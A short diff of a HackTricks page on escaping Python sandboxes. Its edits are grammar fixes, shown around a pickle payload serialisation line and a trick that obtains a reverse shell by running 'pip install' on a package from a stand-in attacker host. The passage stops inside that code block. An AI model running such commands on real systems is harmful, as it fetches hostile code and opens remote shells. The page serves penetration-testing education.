HackTricks-wiki/hacktricks/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md

 print(base64.b64encode(pickle.dumps(P(), protocol=0)))
 ```

-For more information about how does pickle works check this: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/)
+For more information about how pickle works check this: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/)

 ### Pip package

 Trick shared by **@isHaacK**

-If you have access to `pip` or to `pip.main()` you can install an arbitrary package and obtain a reverse shell calling:
+If you have access to `pip` or `pip.main()` you can install an arbitrary package and obtain a reverse shell calling:

 ```bash
 pip install http://attacker.com/Rerverse.tar.gz